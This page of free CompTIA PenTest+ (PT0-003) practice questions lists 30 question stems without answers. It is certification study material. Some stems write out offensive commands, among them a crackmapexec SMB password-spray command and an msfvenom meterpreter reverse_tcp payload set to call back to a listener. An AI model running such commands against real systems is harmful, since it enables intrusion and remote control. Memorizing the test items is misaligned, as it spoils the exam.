Free Certification Practice Questions

COMPTIA-PENTEST

Loading…
CompTIA's PT0-003 A penetration tester wants to send a specific network packet with custom flags and sequence numbers to a vulnerable target. Which of the following should the tester use?
#1
CompTIA's PT0-003 Which of the following explains the reason a tester would opt to use DREAD over PTES during the planning phase of a penetration test?
#2
CompTIA's PT0-003 A penetration tester is performing a security review of a web application. Which of the following should the tester leverage to identify the presence of vulnerable open-source libraries?
#3
CompTIA's PT0-003 A penetration tester finds that an application responds with the contents of the /etc/passwd file when the following payload is sent:Which of the following should the tester recommend in the report to best prevent this type of vulnerability?
#4
CompTIA's PT0-003 A penetration tester is conducting reconnaissance for an upcoming assessment of a large corporate client. The client authorized spear phishing in the rules of engagement. Which of the following should the tester do first when developing the phishing campaign?
#5
CompTIA's PT0-003 A penetration tester needs to test a very large number of URLs for public access. Given the following code snippet:Which of the following changes is required?
#6
CompTIA's PT0-003 During a penetration test, a tester captures information about an SPN account. Which of the following attacks requires this information as a prerequisite to proceed?
#7
CompTIA's PT0-003 While performing an internal assessment, a tester uses the following command: crackmapexec smb 192.168.1.0/24 -u user.txt -p Summer123@Which of the following is the main purpose of the command?
#8
CompTIA's PT0-003 A penetration testing team needs to determine whether it is possible to disrupt the wireless communications for PCs deployed in the client's offices. Which of the following techniques should the penetration tester leverage?
#9
CompTIA's PT0-003 Which of the following tasks would ensure the key outputs from a penetration test are not lost as part of the cleanup and restoration activities?
#10
CompTIA's PT0-003 A tester gains initial access to a server and needs to enumerate all corporate domain DNS records. Which of the following commands should the tester use?
#11
CompTIA's PT0-003 A penetration tester is performing network reconnaissance. The tester wants to gather information about the network without causing detection mechanisms to flag the reconnaissance activities. Which of the following techniques should the tester use?
#12
CompTIA's PT0-003 A penetration tester reviews a SAST vulnerability scan report. The following lines of code have been reported as vulnerable:Which of the following is the best method to remediate this vulnerability?
#13
CompTIA's PT0-003 During a security assessment, a penetration tester uses a tool to capture plaintext log-in credentials on the communication between a user and an authentication system. The tester wants to use this information for further unauthorized access. Which of the following tools is the tester using?
#14
CompTIA's PT0-003 A penetration tester established an initial compromise on a host. The tester wants to pivot to other targets and set up an appropriate relay. The tester needs to enumerate through the compromised host as a relay from the tester's machine. Which of the following commands should the tester use to do this task from the tester's host?
#15
CompTIA's PT0-003 A penetration tester is unable to identify the Wi-Fi SSID on a client's cell phone. Which of the following techniques would be most effective to troubleshoot this issue?
#16
CompTIA's PT0-003 During a web application assessment, a penetration tester identifies an input field that allows JavaScript injection. The tester inserts a line of JavaScript that results in a prompt, presenting a text box when browsing to the page going forward. Which of the following types of attacks is this an example of?
#17
CompTIA's PT0-003 A penetration tester attempts unauthorized entry to the company’s server room as part of a security assessment. Which of the following is the best technique to manipulate the lock pins and open the door without the original key?
#18
CompTIA's PT0-003 Which of the following technologies is most likely used with badge cloning? (Choose two.) E. Zigbee F. CAN bus
#19
CompTIA's PT0-003 During a penetration test of a web application, the tester gains full access to the application's source code. The application repository includes thousands of code files. Given that the assessment timeline is very short, which of the following approaches would allow the tester to identify hard-coded credentials most effectively?
#20
CompTIA's PT0-003 A penetration tester is evaluating a SCADA system. The tester receives local access to a workstation that is running a single application. While navigating through the application, the tester opens a terminal window and gains access to the underlying operating system. Which of the following attacks is the tester performing?
#21
CompTIA's PT0-003 Given the following script:Which of the following is the penetration tester most likely trying to do?
#22
CompTIA's PT0-003 A penetration tester needs to collect information transmitted over the network for further steps in an internal assessment. Which of the following would most likely accomplish this goal?
#23
CompTIA's PT0-003 A tester plans to perform an attack technique over a compromised host. The tester prepares a payload using the following command: msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=10.12.12.1 LPORT=10112 -f csharpThe tester then takes the shellcode from the msfvenom command and creates a file called evil.xml. Which of the following commands would most likely be used by the tester to continue with the attack on the host?
#24
CompTIA's PT0-003 A penetration tester is developing the rules of engagement for a potential client. Which of the following would most likely be specified in the rules of engagement?
#25
CompTIA's PT0-003 A penetration tester has found a web application that is running on a cloud virtual machine instance. Vulnerability scans show a potential SSRF for the same application URL path with an injectable parameter. Which of the following commands should the tester run to successfully test for secrets exposure exploitabilty?
#26
CompTIA's PT0-003 A tester obtains access to an endpoint subnet and wants to move laterally in the network. Given the following output:Which of the following command and attack methods is the most appropriate for reducing the chances of being detected?
#27
CompTIA's PT0-003 A penetration tester is authorized to perform a DoS attack against a host on a network. Given the following input:Which of the following attack types is most likely being used in the test?
#28
CompTIA's PT0-003 Which of the following describes the process of determining why a vulnerability scanner is not providing results?
#29
CompTIA's PT0-003 A penetration tester runs a vulnerability scan that identifies several issues across numerous customer hosts. The executive report outlines the following information:The client is concerned about the availabilty of its consumer-facing production application. Which of the following hosts should the penetration tester select for additional manual testing?
#30